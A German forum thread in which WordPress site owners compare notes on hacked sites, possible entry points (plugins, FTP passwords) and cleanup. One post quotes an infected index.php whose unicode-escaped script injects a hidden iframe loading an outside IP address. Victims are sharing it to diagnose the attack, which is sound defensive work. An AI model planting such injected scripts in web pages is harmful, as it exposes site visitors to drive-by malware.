Trojaner auf Website

  • Ich nochmal. Also beim Paged Plugin sollte sich das der Autor nochmal ansehen. Mit den URL's kann man einiges veranstalten aber ob es da eine Weg gibt, was zu modifizieren, sprengt meinen Zeitrahmen für Analyse.
    Was ich finden konnte aber nicht gänzlich überprüft hab:

    Wenn es jemand schafft, eine php Datei in einen Ordner zu legen, der im include Pfad liegt und vor dem angefügten include Pfad liegt, dann wird diese php ausgeführt, wenn das zu patchende Kommentar Template über den eval weitere php's pur included.
    Beispiel: Wenn der tmp Pfad der erste in include Path wäre, könnte ich einen upload machen, das File aber nicht mit move verschieben (bleibt im tmp) sondern Rechte so setzen, das alle das benutzen können und jemand anderes würde die mit seinen Plugin ausführen.

    Aber wie gesagt, dass sollte er Autor des Plugins klären.


    Auf dieser zweiten Seite sind Semmelstatz und Shutter Reloaded übrigens nicht installiert. Also sehe ich pluginmäßig keine Zusammenhänge.


    Das Problem bei der Suche nach der Lücke ist, dass man alles ansehen muß. Wenn du es WordPress selbst anlasten möchtest, dann kann man das nur mit Bestimmtheit, wenn du:

    1. keine Plugins benutzt
    2. das Kubrick Standard Theme benutzt
    3. nicht am Code geschraubt hast.

    Sobald aber Themes, Plugins und Codeänderungen im Spiel sind, muss man die zuerst ansehen und sich dann zu WP selbst durcharbeiten. Da du aber viel zu ungenaue Angaben zum Pluginumfeld deiner Installationen gemacht hast:
    "dies Plugin nicht, aber dafür das dort und jenes sag ich gar nicht erst, hab ich aber doch laufen", kann man kein vernünftige Analyse fahren und ich brech das hiermit ab!

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ähh, wie jetzt :confused: :confused: Es geht mir hier überhaupt nicht darum, WordPress irgendwas 'anzulasten'. Ich habe mich an diesen Thread gehängt, da zwei meiner Seiten auf genau die gleiche Weise gehackt worden sind wie die Seite der Threaderstellerin und es vielleicht ganz interessant wäre, den Grund des Übels herauszukriegen. Ich habe hier, wenn ich richtig lese, nirgends geschrieben "dies Plugin nicht, aber dafür das dort und jenes sag ich gar nicht erst, hab ich aber doch laufen".
    Noch mal zu den Einzelheiten:

    Befallen war die index.php im Rootverzeichnis meiner beiden Seiten, die sah so aus:

    PHP
    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wp-blog-header.php');
    ?><!-- ~ --><!-- Nerzul --><script type="text/javascript">
    document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
    </script><!-- Nerzul --><!-- ~ -->


    Dieser JavaScript-Aufruf ließ sich zwar schnell und simpel wieder aus der index.php entfernen; die Frage ist aber, wie kam er da rein?

    Ich kann auch gerne die Plugins meiner zwei befallenen Seiten noch mal explizit aufführen:

    Seite 1 hat folgende installierte und aktivierte Plugins:
    1. Semmelstatz (das momentan wohl nicht zum Download bereitsteht, daher kein Link)
    2. Shutter Reloaded

    Seite 2 hat die 2 oben genannten nicht installiert, was einfach eine Annahme meinerseits dafür sein sollte, dass sie also wohl eher nicht als Ursache in Frage kommen, und nicht als 'Verschleierung meines Pluginumfeldes' gedacht war. Es sind dort installiert:
    1. Custom Query String
    2. Less
    3. PXS Mailform
    4. WP-Forecast
    5. Zap_NewWindow

    Das Paged-Comments-Plugin ist auf keiner dieser Seiten installiert, ich habe auch keine Ahnung, warum das hier überhaupt thematisiert wurde.

    Svenja, es wäre schön, wenn du deine Plugins hier auch nochmal kurz auflistest, damit wir vergleichen können, ob es da eventuell irgendwelche Übereinstimmungen gibt.

  • Ich habe hier, wenn ich richtig lese, nirgends geschrieben "dies Plugin nicht, aber dafür das dort und jenes sag ich gar nicht erst, hab ich aber doch laufen".


    War auch nur sinngemäß gemeint, sonst wäre es ja ein quote Block geworden :)
    Die Kernaussage von dir war ja, das du eine direkt befallene WordPress 2.5.1 Version hattest, deswegen auch der Aufriss hier. Wäre es eine ge-updatete WP 2.3.2 gewesen (Svenja setzte ja eine solche 2.3.2 ein), wäre es nicht so kritisch, denn das es da passieren kann, wurde bereits veröffentlicht.

    Mir geht es darum, dass du sagst, es wäre eine WP 2.5.1 erfolgreich angegriffen worden, und das ist eine sehr kritische Aussage!

    Falls du diese Aussage definitiv bestätigst, wäre die Domain mit den 2 Plugins ein Ansatz zur Suche. Dann würde ich mir ein frisches WP 2.5.1 im Testsystem als neuen vhost einrichten, Shutter reloaded installieren und wäre dir verbunden, wenn du mir Semmelstatz zippen und per PM schicken könntest. Evtl. auch noch ein Link zu Theme (geht ja auch über Themes). Denn dann wären alle WP 2.5.1 Installationen potentiell gefährdet nach deiner Aussage.

  • [COLOR="LightBlue"]und freie Meinungsäußerung[/COLOR]


    Hehe. :p

    Bei 644 dürfte eigentlich niemand was schreiben können. Du kannst es ja mal alle paar Tage beobachten, jetzt nachdem du es entfernt hast, ob es irgendwann wieder reingeschrieben wird und dann kann man ja gezielt in den Logs schauen.

    Heuer ist es leider nur ein Ratespiel ohne entsprechende Infos.

    wpseek.com - Die WordPress-Code-Suchmaschine

  • Nur so als Hinweis: Ein böser Bube muss nicht unbedingt durch WP reinkommen. Hat man noch andere Skripte auf dem Server, sind das ebenfalls entsprechende potentielle Einfallstore. Und einfach mal nach einer index.php (egal ob WP oder nicht) suchen ist ja was einfaches.

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • Diese Idioten haben in meinem Web in verschiedenen Verzeichnissen ca. 90 mit [FONT=Arial]Trojan-Clicker.HTML.IFrame.bk [/FONT]verseuchte Dateien untergebracht, insbesondere index.htm und index.php, aber auch andere wie footer.php und header.php. Mein Virenprogramm (G Data Internet Security) schlägt Alarm, wenn ich die entsprechenden Seiten aufrufe und erkennt das Virus auch, wenn ich die Dateien vom Web auf meinen lokalen PC lade, allerdings noch nicht während des FTP-Transfers, sondern erst, wenn ich die entsprechenden Verzeichnisse scanne.

    Nun habe ich noch 3 Fragen:

    1. Welchen Schaden kann dieses Ding anrichten, wenn ein Virenscanner das Teil nicht (er)kennt oder jemand gar kein Antivirenprogramm hat?
      a) wenn ich eine Webseite mit dem Teil aufrufe und
      b) wenn ich die Datei in Toto auf meinem Rechner habe
      c) auf dem Server
    2. Wie kann ich den Code löschen? Mein Antivirenprogramm lässt mich so eine betroffene Datei nicht öffnen (auch nicht per Editor nach Umbenennung) und schafft es selbst nicht, sie zu desinfizieren.
    3. Sollte man als Betroffener den PC mit irgendeiner speziellen Rescue-Disk booten und entgiften (z.B. Knoppicillin o.ä.), oder kann ich davon ausgehen, dass mein Antivirenprogramm unter XP das hinbekommt?

    Danke schon mal für eure Antworten!

    Gruß. rolex

  • Welchen Schaden kann dieses Ding anrichten, wenn ein Virenscanner das Teil nicht (er)kennt oder jemand gar kein Antivirenprogramm hat?
    wenn ich eine Webseite mit dem Teil aufrufe und


    Allen Schaden, den der Browser zulässt und in dem Scriptcode produziert werden kann.


    wenn ich die Datei in Toto auf meinem Rechner habe


    solange du nix vom FTP download davon ausführst (*.exe zum Beispiel) keinen.


    auf dem Server


    alles was das Script auf deinem Server zustandebringen kann (z.B: Spamversender oder IRC Bot)


    Wie kann ich den Code löschen? Mein Antivirenprogramm lässt mich so eine betroffene Datei nicht öffnen (auch nicht per Editor nach Umbenennung) und schafft es selbst nicht, sie zu desinfizieren.


    Am besten eine Knoppix LiveCD starten, downloaden, reparieren und uploaden.


    Sollte man als Betroffener den PC mit irgendeiner speziellen Rescue-Disk booten und entgiften (z.B. Knoppicillin o.ä.), oder kann ich davon ausgehen, dass mein Antivirenprogramm unter XP das hinbekommt?

    Dein Virenprogramm wird das ggf. nur löschen also Totalverlust, siehe vorheriger Punkt.

    Mich würde interessieren, welche WP Version betroffen ist. Eine ältere, von der das bekannt ist, dass sie anfällig sind oder die aktuelle WP 2.5.1 ?

  • Welchen Schaden kann dieses Ding anrichten, wenn ein Virenscanner das Teil nicht (er)kennt oder jemand gar kein Antivirenprogramm hat?
    wenn ich eine Webseite mit dem Teil aufrufe und


    Allen Schaden, den der Browser zulässt und in dem Scriptcode produziert werden kann.


    wenn ich die Datei in Toto auf meinem Rechner habe


    solange du nix vom FTP download davon ausführst (*.exe zum Beispiel) keinen.


    auf dem Server


    alles was das Script auf deinem Server zustandebringen kann (z.B: Spamversender oder IRC Bot)


    Wie kann ich den Code löschen? Mein Antivirenprogramm lässt mich so eine betroffene Datei nicht öffnen (auch nicht per Editor nach Umbenennung) und schafft es selbst nicht, sie zu desinfizieren.


    Am besten eine Knoppix LiveCD starten, downloaden, reparieren und uploaden.


    Sollte man als Betroffener den PC mit irgendeiner speziellen Rescue-Disk booten und entgiften (z.B. Knoppicillin o.ä.), oder kann ich davon ausgehen, dass mein Antivirenprogramm unter XP das hinbekommt?

    Dein Virenprogramm wird das ggf. nur löschen also Totalverlust, siehe vorheriger Punkt.

    Mich würde interessieren, welche WP Version betroffen ist. Eine ältere, on der das bekannt ist, dass sie anfällig sind oder die aktuelle WP 2.5.1 ?

  • Danke für die Antworten!


    Mich würde interessieren, welche WP Version betroffen ist. Eine ältere, von der das bekannt ist, dass sie anfällig sind oder die aktuelle WP 2.5.1 ?

    Ich habe (noch) gar kein WP. Mein Hoster meint, der Angriff hätte per FTP stattgefunden. Möglichweise wurde mein 8stelliges PW gehackt. Habe es schon geändert.

  • Mein Hoster meint, der Angriff hätte per FTP stattgefunden. Möglichweise wurde mein 8stelliges PW gehackt. Habe es schon geändert.

    Das ist auch das, was mein Hoster meinte. Ich habe das FTP-Passwort geändert und sämtliche index.php-Dateien auf dem Webspace mit den Originaldateien ersetzt, seitdem ist Ruhe.

  • Interessant. Ein 8stelliges FTP Passwort, das 26 Groß- und 26 Kleinbuchstaben + 10 Zahlen enthalten kann (Sonderzeichen mal außen vor), bildet 62 ^ 8 = 218340105584896 Kombinationen. Einen brute-force Angriff sollte man ausschließen können. Habt ihr evtl. ein FTP Plugin für FireFox (oder anderen Browser) benutzt, dass man ggf. per Javascript z.B. auf Chrome Ebene aus einer kompromittierten Seite heraus auslesen könnte ?

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!